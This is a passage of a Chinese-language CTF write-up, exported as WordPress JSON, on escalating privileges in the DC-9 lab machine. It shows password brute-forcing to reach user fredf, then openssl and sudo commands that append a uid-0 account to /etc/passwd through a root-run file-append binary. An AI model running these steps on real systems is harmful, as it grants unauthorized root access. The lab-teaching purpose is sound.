src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116485.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321204937022\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116486.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116486.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321205015016\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116487.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116487.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321205048170\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<p>\u7136\u540e\u5728\u6700\u540e\u4e00\u4e2a\u7528\u6237\u53d1\u73b0\u4e86\u4e00\u4e9b\u4e1c\u897f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116488.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116488.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321205218811\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c06\u5b57\u5178\u6dfb\u52a0\u5230\u5bc6\u7801\u5b57\u5178\u4e2d\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116489.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116489.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321205513233\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53c8\u5f97\u5230\u4e00\u4e2a\u7528\u6237\uff1a<\/p>\n<h3>\u5207\u6362\u81f3fredf<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116490.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116490.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321205636077\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">file \/opt\/devstuff\/dist\/test\/test\n# \/opt\/devstuff\/dist\/test\/test: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 2.6.32, BuildID[sha1]=28ba79c778f7402713aec6af319ee0fbaf3a8014, stripped<\/code><\/pre>\n<p>\u4f20\u5230\u672c\u5730\u5206\u6790\u4e00\u4e0b\uff0c\u4f46\u662f\u597d\u590d\u6742\uff0c\u4e0d\u7ba1\u4ed6\u4e86\uff0c\u5148\u8fd0\u884c\u4e00\u4e0b\u518d\u8bf4\uff1a<\/p>\n<pre><code class=\"language-text\">Usage: python test.py read append<\/code><\/pre>\n<p>\u67e5\u4e00\u4e0b\u8fd9\u4e2a<code>test.py<\/code>\uff1a<\/p>\n<pre><code>find \/ -name test.py  2&gt;\/dev\/null<\/code><\/pre>\n<pre><code class=\"language-text\">\/opt\/devstuff\/test.py\n\/usr\/lib\/python3\/dist-packages\/setuptools\/command\/test.py<\/code><\/pre>\n<pre><code class=\"language-bash\">cat \/opt\/devstuff\/test.py<\/code><\/pre>\n<pre><code class=\"language-python\">#!\/usr\/bin\/python\n\nimport sys\n\nif len (sys.argv) != 3 :\n    print (&quot;Usage: python test.py read append&quot;)\n    sys.exit (1)\n\nelse :\n    f = open(sys.argv[1], &quot;r&quot;)\n    output = (f.read())\n\n    f = open(sys.argv[2], &quot;a&quot;)\n    f.write(output)\n 
   f.close()<\/code><\/pre>\n<p>\u4f20\u9012\u4e09\u4e2a\u53c2\u6570\uff0c\u7b2c\u4e00\u4e2a\u53c2\u6570\u662f <code>.\/test<\/code>\uff0c\u7b2c\u4e8c\u4e2a\u53c2\u6570\u6307\u5b9a\u7684\u6587\u4ef6\u5185\u5bb9\u4ee5\u8ffd\u52a0\u65b9\u5f0f\u5199\u8fdb\u7b2c\u4e09\u4e2a\u53c2\u6570\u6307\u5b9a\u7684\u6587\u4ef6\u91cc\u3002\u4e0b\u9762\u7684\u547d\u4ee4\u901a\u8fc7 sudo \u8fd0\u884c\u5b83\uff0c\u56e0\u6b64\u8ffd\u52a0\u662f\u4ee5 root \u6743\u9650\u6267\u884c\u7684\u3002<\/p>\n<p>\u76f4\u63a5\u5c31\u60f3\u5230\u4e86\u521b\u5efa\u4e00\u4e2aroot\u6743\u9650\u7684\u7528\u6237\u5b9e\u73b0\u767b\u5f55\uff01<\/p>\n<h3>\u521b\u5efaroot\u7528\u6237\u6dfb\u52a0\u8fdb\/etc\/passwd<\/h3>\n<h4>\u521b\u5efa\u7528\u6237<\/h4>\n<pre><code class=\"language-bash\">openssl passwd -1 -salt hack hack\n# $1$hack$xR6zsfvpez\/t8teGRRSNr.\necho &#039;hack:$1$hack$xR6zsfvpez\/t8teGRRSNr.:0:0:root:\/bin\/bash&#039; &gt; \/tmp\/hack\nsudo .\/test \/tmp\/hack \/etc\/passwd\ncat \/etc\/passwd<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116491.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116491.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321211528551\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u5207\u6362\u7528\u6237\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116492.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  
decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116492.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321211615198\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u5207\u6362\u62ff\u5230flag\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"<p>DC-9 \u6253\u5f00\u626b\u4e00\u4e0b\uff1a \u4e0d\u77e5\u9053\u662f\u4e0d\u662f\uff0cnmap\u626b\u4e00\u4e0b\uff1a \u770b\u6765\u662f\u6ca1\u95ee\u9898\u4e86\uff0c\u53ef\u4ee5\u5f00\u59cb\u653b\u51fb\u4e86\uff01 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf  [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-438","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/438","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=438"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/438\/revisions"}],"predecessor-version":[{"id":439,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/438\/revisions\/439"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=438"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/1
62.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=438"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=438"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}